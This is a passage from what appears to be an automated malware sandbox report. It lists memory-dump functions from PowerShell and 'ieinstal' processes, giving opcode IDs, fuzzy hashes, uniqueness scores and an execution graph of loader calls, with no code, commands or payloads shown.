                                                                                                                • Instruction Fuzzy Hash: CFD06736104249AF8B01CE84D951C6A7F6AEB49214B14C049BE5946262C633E932EBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083D88FD Relevance: .0, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bf6df736f0f41dc26b425684e23a895b1c13125d4713c20e5fcfd5bea36a49e4
                                                                                                                • Instruction ID: 68f7d2ccc10433460c02c41f711105ed4e69c168030c8dab4a8543bcbacf2e53
                                                                                                                • Opcode Fuzzy Hash: bf6df736f0f41dc26b425684e23a895b1c13125d4713c20e5fcfd5bea36a49e4
                                                                                                                • Instruction Fuzzy Hash: 85D0923060E3808FCB028B28D665865BFB1AE8B20031A96D2D485CB263C621AC85CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083D88ED Relevance: .0, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7ea7007f7f4564b605f09aad89cd70aa82f4f9159671943890663fca79e1a185
                                                                                                                • Instruction ID: 3b63d7350dcebb4526d3fbdf5f9b78fb95150e6fef6b2acc198c53805bb860fc
                                                                                                                • Opcode Fuzzy Hash: 7ea7007f7f4564b605f09aad89cd70aa82f4f9159671943890663fca79e1a185
                                                                                                                • Instruction Fuzzy Hash: 14D0923460E3C18FCB038B38D664426BFB2AE8720431E86DBD485CF263C6249C49CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083DA2D7 Relevance: .0, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e26e7e7558151554ab6ecae42cc4baf6879d0a6aaff6f3bbedb30817b3878bb3
                                                                                                                • Instruction ID: d07704f4f540fdeae48e19b0a0494c1e1b4a6ddac99569afc08c2ae677a75f90
                                                                                                                • Opcode Fuzzy Hash: e26e7e7558151554ab6ecae42cc4baf6879d0a6aaff6f3bbedb30817b3878bb3
                                                                                                                • Instruction Fuzzy Hash: 53D0A93114E3C04FCB03EB30C6A8540BFB1AE4322131E82DAC8C58F123C620AC08CB32
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083DA300 Relevance: .0, Instructions: 12COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4fa1e1c017ada076c09f7fc1ecfa5d833ce11ecc5f5b8e973bf288ea8b6bacfd
                                                                                                                • Instruction ID: cd1bee5542abba45af407462ecbc14a4e76e7f2dd547a8408e49b232110c7d2b
                                                                                                                • Opcode Fuzzy Hash: 4fa1e1c017ada076c09f7fc1ecfa5d833ce11ecc5f5b8e973bf288ea8b6bacfd
                                                                                                                • Instruction Fuzzy Hash: 69D06C34A492818FCB029B28D568412BFA1EB4A21032A82EAD585CB262C6249C40CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083D9081 Relevance: .0, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a1050ced2369678a0ffd634b9c7e8f88cc1e09968f098bd68c9d9952d1ae890b
                                                                                                                • Instruction ID: dd1c6f757ecc14d6957e4e4f3283da060fc2b0a199131ad318aff8d317d35707
                                                                                                                • Opcode Fuzzy Hash: a1050ced2369678a0ffd634b9c7e8f88cc1e09968f098bd68c9d9952d1ae890b
                                                                                                                • Instruction Fuzzy Hash: C3C08C3BB010088FCB00CB94F8848DCF372FBC8229B00C022E60183141C7305825DB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 083D003B Relevance: 5.6, Strings: 1, Instructions: 4329COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: l"l
                                                                                                                • API String ID: 0-3151654823
                                                                                                                • Opcode ID: 749316cd6fa20c08b437c4c231d395caf9b8f8d861af5d29b25b4c21655f51ef
                                                                                                                • Instruction ID: 6590b5065a5e3062be972451497037c9b6e6d70afbaa633816bf6839d25e1fef
                                                                                                                • Opcode Fuzzy Hash: 749316cd6fa20c08b437c4c231d395caf9b8f8d861af5d29b25b4c21655f51ef
                                                                                                                • Instruction Fuzzy Hash: 73A32C74E052198FDB24EFA4C951BDE7BB6EF84304F1048E99108AB294DF396E91CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083D0040 Relevance: 5.6, Strings: 1, Instructions: 4326COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: l"l
                                                                                                                • API String ID: 0-3151654823
                                                                                                                • Opcode ID: dbf82cf07724babdf12243ea269113794085f03161bd8abd0323b351739785f7
                                                                                                                • Instruction ID: 2af73369f23c8f1c8d40b0e9818d78c43765ca9ddff6575ba554ffef94ae721a
                                                                                                                • Opcode Fuzzy Hash: dbf82cf07724babdf12243ea269113794085f03161bd8abd0323b351739785f7
                                                                                                                • Instruction Fuzzy Hash: DCA32C74E052198FDB24EFA4C951BDE7BB6EF84304F1048E99108AB294DF396E91CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04B2CD89 Relevance: 3.8, Strings: 2, Instructions: 1294COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25048382622.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_4b20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,k"l$0o&k
                                                                                                                • API String ID: 0-3053910252
                                                                                                                • Opcode ID: b5c7503cf1a3ef363b41dd700140d1a9e664fc1af03999275495ddb9f2d3afb5
                                                                                                                • Instruction ID: e7c4b6edf2feacb478d6ef2e599610033bd48a588743a79babd0e552f3a3e4dc
                                                                                                                • Opcode Fuzzy Hash: b5c7503cf1a3ef363b41dd700140d1a9e664fc1af03999275495ddb9f2d3afb5
                                                                                                                • Instruction Fuzzy Hash: 51A2B038B052149FEB24ABB8DC11BEE6A77EBC4704F1481A995055F784DFB2CD418BD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04B2CD98 Relevance: 3.8, Strings: 2, Instructions: 1287COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25048382622.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_4b20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,k"l$0o&k
                                                                                                                • API String ID: 0-3053910252
                                                                                                                • Opcode ID: ba8c60f5f1b028c629714c5b7112647e1dd607ea939991a015ffaf41a3629c6e
                                                                                                                • Instruction ID: 0a3cfb5a16ca700f2cacd28a961a5db3e1cc5329a25a7f308956318600749300
                                                                                                                • Opcode Fuzzy Hash: ba8c60f5f1b028c629714c5b7112647e1dd607ea939991a015ffaf41a3629c6e
                                                                                                                • Instruction Fuzzy Hash: 41A2B038B051149FEB24ABB8DC11BEE6A77EBC4704F1481A995065F784DFB2CD418BD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08309678 Relevance: 1.9, Instructions: 1873COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183069224.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8300000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 762e35a5da6ebc9a6f98aab5d123c038354bdb0eb3946d45911e57bc8eaaf286
                                                                                                                • Instruction ID: e479b9352c6112e09d0ceb0d30d195c057539f84ac451cb0b4bbbcefc24decd3
                                                                                                                • Opcode Fuzzy Hash: 762e35a5da6ebc9a6f98aab5d123c038354bdb0eb3946d45911e57bc8eaaf286
                                                                                                                • Instruction Fuzzy Hash: 09136C78A012148FDB14EBA0D951BEEBBB6EFC8305F1145A8D109AB395CF35AD82CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08309657 Relevance: .7, Instructions: 716COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183069224.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8300000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 20c09842fd29c9d8689cd7175f0964e9a8ca2638bf8deada2481522d72528ba9
                                                                                                                • Instruction ID: 5c063674edcc8ec499b03f3dfbfe4e04104f0ca8306c339bfcba4ec132ded8b8
                                                                                                                • Opcode Fuzzy Hash: 20c09842fd29c9d8689cd7175f0964e9a8ca2638bf8deada2481522d72528ba9
                                                                                                                • Instruction Fuzzy Hash: A1623B74A002188FDB14EFA4C850BEE7BB6EF89301F1145E9D109AB795DF39AE818F51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083D52B0 Relevance: .5, Instructions: 498COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 344f7f01a76842c712d6f5850d3b634b3d31f82180d5a628057ae0607fe8fca0
                                                                                                                • Instruction ID: ddcbfe68732bf3ea9596affce824fd9d272b9328f372f064bfb349709f41d6e2
                                                                                                                • Opcode Fuzzy Hash: 344f7f01a76842c712d6f5850d3b634b3d31f82180d5a628057ae0607fe8fca0
                                                                                                                • Instruction Fuzzy Hash: DA221774A042588FDB14EFF4C8557EEBBB2BF84304F1149A8D009AB655DB39AE418F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083D52C0 Relevance: .5, Instructions: 491COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7b063d0a5fcb2d65dd7fb0b264b5faeb3dbc9c2883b8b810dab51ab4ff1430de
                                                                                                                • Instruction ID: 7b45f8d4c88436f2e711113895f8c19fe1b6997133c4010f592c03bb9e76243e
                                                                                                                • Opcode Fuzzy Hash: 7b063d0a5fcb2d65dd7fb0b264b5faeb3dbc9c2883b8b810dab51ab4ff1430de
                                                                                                                • Instruction Fuzzy Hash: C7221774A042498FDB14EFF4C8557EEBBB2BF88304F1149A8D009AF654DB39AE418F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0870300A Relevance: .4, Instructions: 351COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0ff58c9414bea38c638341aee316c4be75389896cefa0b990903de3fc2cfa470
                                                                                                                • Instruction ID: c851670f976e01475003efd3ae34c56ed756dee85bea5f5af8bac1502cac2aa2
                                                                                                                • Opcode Fuzzy Hash: 0ff58c9414bea38c638341aee316c4be75389896cefa0b990903de3fc2cfa470
                                                                                                                • Instruction Fuzzy Hash: A4C16374382340BFE715AB70DC63B6A7B52ABC5B10F7446B8B6016F3D1CDB2A8568784
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08703018 Relevance: .4, Instructions: 350COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9d54fdbcf05d1f4cd02646e7928832ac2db125975fde0970622540fec943b3e4
                                                                                                                • Instruction ID: 0ae8514062384581d8d861a4709328e44c9321b7603c3dfeb55c00f2d39e7609
                                                                                                                • Opcode Fuzzy Hash: 9d54fdbcf05d1f4cd02646e7928832ac2db125975fde0970622540fec943b3e4
                                                                                                                • Instruction Fuzzy Hash: A8C16374382340BFE725A770DC63B6A7A52ABC5B10F7446B8B6016F3D1CDB2A8568784
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:0.1%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:33.3%
                                                                                                                Total number of Nodes:18
                                                                                                                Total number of Limit Nodes:1
                                                                                                                execution_graph 66044 1e692b20 66046 1e692b2a 66044->66046 66047 1e692b3f LdrInitializeThunk 66046->66047 66048 1e692b31 66046->66048 66052 1e6f8305 66065 1e692b10 LdrInitializeThunk 66052->66065 66054 1e6f834d 66058 1e6f83c4 66054->66058 66066 1e690554 11 API calls 66054->66066 66056 1e6f83ff 66058->66056 66067 1e692b90 LdrInitializeThunk 66058->66067 66059 1e6f837b 66059->66058 66068 1e70fdce LdrInitializeThunk 66059->66068 66061 1e6f841e 66061->66058 66069 1e692ed0 LdrInitializeThunk 66061->66069 66063 1e6f8430 66063->66058 66070 1e692da0 LdrInitializeThunk 66063->66070 66065->66054 66066->66059 66067->66056 66068->66061 66069->66063 66070->66058 66074 1e6929f0 LdrInitializeThunk

                                                                                                                Executed Functions

                                                                                                                Function 1E692E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 14 1e692e50-1e692e5c LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 208ec20574736995b174c8fb22a3dfb6d31660e00b18afdf6d2dd3ea69e701f3
                                                                                                                • Instruction ID: 0f0fed3567ca6629d9ba0d1809ce6cb48fdc27b5ec15092685253d83ab5fa275
                                                                                                                • Opcode Fuzzy Hash: 208ec20574736995b174c8fb22a3dfb6d31660e00b18afdf6d2dd3ea69e701f3
                                                                                                                • Instruction Fuzzy Hash: 3F900261B4110442D50465594518B0A410587E1711FD5C519E2064514DCA29CC52B126
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 16 1e692ed0-1e692edc LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 631f0443ee49eccef9f742aaf7e6ab4c088432ec5cfa6426b78bc734aa33c2f0
                                                                                                                • Instruction ID: 337e2e61276746ef74539d6055598d300555df1918abf5fca8d4619527b8a111
                                                                                                                • Opcode Fuzzy Hash: 631f0443ee49eccef9f742aaf7e6ab4c088432ec5cfa6426b78bc734aa33c2f0
                                                                                                                • Instruction Fuzzy Hash: 79900221E011004245447569894890A81056BE16217D5C625A1998510DC9698C65A665
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 15 1e692eb0-1e692ebc LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ff44874c7cf2c5eb8b1e56c0f717c86ce5c15db22549a513d1b9bbcf93ae856a
                                                                                                                • Instruction ID: ec9f358e23b100ca6c278b160bb0d1749ba2021cd2fb52ee844288c6e66e3d54
                                                                                                                • Opcode Fuzzy Hash: ff44874c7cf2c5eb8b1e56c0f717c86ce5c15db22549a513d1b9bbcf93ae856a
                                                                                                                • Instruction Fuzzy Hash: B6900231A0150402D5046559491870F410547D0712FD5C515A2164515DCA358C51B571
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 17 1e692f00-1e692f0c LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 47ba2209519a0acddc92f420f2d8e11cd8dfb99e990e88d5847ebf59d0671fd0
                                                                                                                • Instruction ID: 3d2410174fe607ce1d390af00dff6c59e8d7cfa437e66bdb24a216a2b451d666
                                                                                                                • Opcode Fuzzy Hash: 47ba2209519a0acddc92f420f2d8e11cd8dfb99e990e88d5847ebf59d0671fd0
                                                                                                                • Instruction Fuzzy Hash: 9D900221A1190042D60469694D18B0B410547D0713FD5C619A1154514CCD258C61A521
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 9 1e692c50-1e692c5c LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 0d7745fc9bb4808943b75455071a54362af56ddd52cee6bccf2aa8b56df482ce
                                                                                                                • Instruction ID: ddd8b3cf5934ad7f31d80862242cafd6eefc052be1548eb769432d63769bbb6f
                                                                                                                • Opcode Fuzzy Hash: 0d7745fc9bb4808943b75455071a54362af56ddd52cee6bccf2aa8b56df482ce
                                                                                                                • Instruction Fuzzy Hash: FE900221B0110003D5447559551C60A810597E1711FD5D515E1414514CDD258C56A222
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 8 1e692c30-1e692c3c LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ef50dcc443bae2e9c44822337f41140729cde027ea095df48112658ab092abd7
                                                                                                                • Instruction ID: bfdde85515ed584192f4577a2c81f56e6e97bac22590560b1bf60f9d2242ed57
                                                                                                                • Opcode Fuzzy Hash: ef50dcc443bae2e9c44822337f41140729cde027ea095df48112658ab092abd7
                                                                                                                • Instruction Fuzzy Hash: D2900229A1310002D5847559550C60E410547D1612FD5D919A1015518CCD258C69A321
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 10 1e692cf0-1e692cfc LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: e4a3614a76b8d2dc6ffcff38989ce5306bb468f4ec44a9bb1a947feab1e532a3
                                                                                                                • Instruction ID: 5d0d9395dd61034fdabd7d92774f0b6931e8e7435774610ca3214a20bae2c9dc
                                                                                                                • Opcode Fuzzy Hash: e4a3614a76b8d2dc6ffcff38989ce5306bb468f4ec44a9bb1a947feab1e532a3
                                                                                                                • Instruction Fuzzy Hash: E9900221A42141525949B559450850B810657E06517D5C516A2414910CC9369C56E621
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 11 1e692d10-1e692d1c LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: afa09cd190d1164d2add6261655f5ba51b17448ac0c8f741c656683231ccbe30
                                                                                                                • Instruction ID: 3e786c7a6c55ff8a42a92be999bfcf09fc02e8cc7f382000179fae9b7b89c9e3
